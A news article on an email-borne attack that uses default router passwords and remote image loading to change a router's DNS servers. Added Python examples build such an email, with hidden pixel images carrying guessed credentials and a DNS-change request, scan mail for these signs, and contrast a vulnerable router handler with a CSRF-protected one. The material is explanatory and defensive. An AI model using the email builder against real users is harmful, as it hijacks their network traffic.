Security researcher Bogdan Calin found that he could remotely compromise the internal networks of users whose routers still have default or weak passwords merely by getting them to open a legitimate-looking email on their iPhone, iPad, or Mac.
Writing for the Acunetix blog, Calin explains that he can craft an email which, once opened, silently reconfigures the recipient's router and changes the DNS servers it uses to an IP address under his, or any attacker's, control.
The attack chains two unrelated weaknesses. The first is that the built-in mail client on Apple devices loads images from remote servers by default when an email is opened. The second is that most Internet users either don't know they can change their router's default password, know they can but choose not to, or change it to a weak one. And once you are into a router's settings interface you can make all sorts of changes.
So what? How is email image loading connected to router configuration? Calin realized that the router models he tested accept configuration parameters through GET requests as well as POST. He exploited this by converting the POST parameters into a GET URL and embedding it in an email as the source of an invisible, one-by-one-pixel image, hidden behind a video or another image; the mail client requests that URL automatically when the message is displayed. He increased the chances of success by hiding a number of additional invisible iframes in the email, each carrying a different default or commonly used username-password combination.
The victim doesn't need to click anything for the exploit to work. Just opening the email makes the mail client issue the request, and if one of the embedded credentials is accepted, the router's DNS servers are changed to an IP address of Calin's choosing.
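The mechanism above, as an added example that is not Calin's code or from the Acunetix post: the script builds an HTML email of the kind described (hidden one-by-one-pixel images whose URLs carry a guessed username and password and a GET query that changes the DNS servers) and then scans the HTML part for the features a mail gateway could flag. The router address 192.168.1.1, the path /apply.cgi, the parameter names dns1/dns2/action, the DNS server IPs (RFC 5737 documentation addresses) and the credential list are all assumptions, not details from the page.

```python
"""Constructed example of the e-mail-borne router CSRF described above and a
scanner for it. Router endpoint, parameter names and credentials are assumed."""
from email.message import EmailMessage
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit, urlencode

# Assumptions (hypothetical): LAN address of the router's admin UI, the
# endpoint that applies settings, and the parameters that set DNS servers.
ROUTER = "192.168.1.1"
APPLY_PATH = "/apply.cgi"
DNS_PARAMS = {"dns1": "203.0.113.53", "dns2": "203.0.113.54", "action": "apply"}

# Illustrative default / commonly used credential pairs to spray.
DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("admin", "1234")]


def csrf_image_urls(host=ROUTER, path=APPLY_PATH, params=DNS_PARAMS, creds=DEFAULT_CREDS):
    """One GET URL per credential pair. Credentials sit in the userinfo part
    of the URL, so the mail client sends HTTP Basic auth without any prompt."""
    query = urlencode(params)
    return [f"http://{user}:{pw}@{host}{path}?{query}" for user, pw in creds]


def build_attack_email(sender, recipient):
    """A benign-looking message whose HTML part carries the hidden requests."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, "Your invoice"
    msg.set_content("Please see the attached invoice.")
    hidden = "".join(
        f'<img src="{u}" width="1" height="1" style="display:none">'
        for u in csrf_image_urls()
    )
    html = f"<html><body><p>Please see the attached invoice.</p>{hidden}</body></html>"
    msg.add_alternative(html, subtype="html")
    return msg


class _SrcCollector(HTMLParser):
    """Collects the attributes of every <img> and <iframe> that has a src."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("img", "iframe"):
            a = dict(attrs)
            if a.get("src"):
                self.refs.append((tag, a))


def _is_private_host(host):
    try:
        return ip_address(host).is_private
    except ValueError:
        return False  # a hostname, not an IP literal


def scan_html(html):
    """Return (tag, url, reasons) for every img/iframe whose URL carries
    credentials, points at a private-network address, or is hidden."""
    collector = _SrcCollector()
    collector.feed(html)
    findings = []
    for tag, a in collector.refs:
        url = a["src"]
        parts = urlsplit(url)
        reasons = []
        if parts.username is not None:
            reasons.append("credentials in URL")
        if parts.hostname and _is_private_host(parts.hostname):
            reasons.append("private-network target")
        tiny = a.get("width") == "1" and a.get("height") == "1"
        if tiny or "display:none" in a.get("style", "").replace(" ", ""):
            reasons.append("hidden element")
        if reasons:
            findings.append((tag, url, reasons))
    return findings


def suspicious_remote_refs(msg):
    """Run scan_html over the HTML body of an EmailMessage, if it has one."""
    part = msg.get_body(preferencelist=("html",))
    return scan_html(part.get_content()) if part is not None else []


if __name__ == "__main__":
    for tag, url, reasons in suspicious_remote_refs(build_attack_email("a@example.com", "b@example.com")):
        print(tag, url, ", ".join(reasons))
```

The scanner deliberately treats any of the three signs as enough to report: a remote image that names a private address is abnormal in mail regardless of size, and credentials in a URL have no legitimate place in a newsletter.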
Calin successfully tested the attack on his own Asus RT-N16 and N56U routers and later updated his report to note that it also appeared to work against TP-Link routers, specifically the TL-WR841N model. He writes that it could well work against other makes and models too, particularly those that accept configuration changes via GET parameters and have no built-in cross-site request forgery (CSRF) protections.
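To make the two conditions in that last sentence concrete, here is an added example (a minimal model, not any vendor's firmware code) of a router settings handler in the vulnerable shape beside a hardened one. The vulnerable version applies a DNS change from any authenticated request, GET included, which is exactly what an automatically loaded image URL produces; the hardened version insists on POST, rejects requests whose Origin header is not the router's own, and requires a CSRF token it issued. The LAN origin http://192.168.1.1 and the parameter name dns1 are assumptions.

```python
"""Added example: the request-handling rule that separates a router vulnerable
to the e-mail attack from one that is not. Toy model, not real firmware."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Assumption: the admin UI is served from this LAN origin.
ROUTER_ORIGIN = "http://192.168.1.1"


@dataclass
class Request:
    method: str
    params: dict = field(default_factory=dict)
    authorized: bool = False          # HTTP Basic auth or session cookie accepted
    origin: Optional[str] = None      # Origin header, if the client sent one
    csrf_token: Optional[str] = None  # token submitted with the form, if any


def vulnerable_apply(req, settings):
    """Applies the change from GET or POST as long as the credentials are
    right. An <img src="http://admin:admin@router/..."> request satisfies it."""
    if not req.authorized:
        return "401 unauthorized"
    if "dns1" in req.params:
        settings["dns1"] = req.params["dns1"]
        return "200 applied"
    return "400 nothing to do"


class HardenedConfig:
    """Same endpoint with the three checks that defeat the image-tag request."""

    def __init__(self):
        self.tokens = set()

    def issue_token(self):
        # Handed to the settings page when it is rendered; an e-mail cannot read it.
        token = secrets.token_hex(16)
        self.tokens.add(token)
        return token

    def _token_ok(self, submitted):
        if submitted is None:
            return False
        return any(hmac.compare_digest(submitted, t) for t in self.tokens)

    def apply(self, req, settings):
        if not req.authorized:
            return "401 unauthorized"
        if req.method != "POST":
            return "405 state changes require POST"
        if req.origin is not None and req.origin != ROUTER_ORIGIN:
            return "403 cross-origin request"
        if not self._token_ok(req.csrf_token):
            return "403 missing or bad CSRF token"
        if "dns1" in req.params:
            settings["dns1"] = req.params["dns1"]
            return "200 applied"
        return "400 nothing to do"


if __name__ == "__main__":
    image_request = Request(method="GET", params={"dns1": "203.0.113.53"}, authorized=True)
    weak = {"dns1": "8.8.8.8"}
    print("vulnerable:", vulnerable_apply(image_request, weak), weak)
    hardened, strong = HardenedConfig(), {"dns1": "8.8.8.8"}
    print("hardened:  ", hardened.apply(image_request, strong), strong)
```

Note that the Origin check alone is not enough: a mail client fetching an image sends no Origin header at all, which is why the POST requirement and the token are the checks that actually stop this attack.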
Users can block this attack altogether by changing their mail settings so that remote images are not loaded automatically when an email is opened, which, as Calin notes, is what most security experts recommend anyway. Replacing the router's default password with a strong one removes the other half of the attack.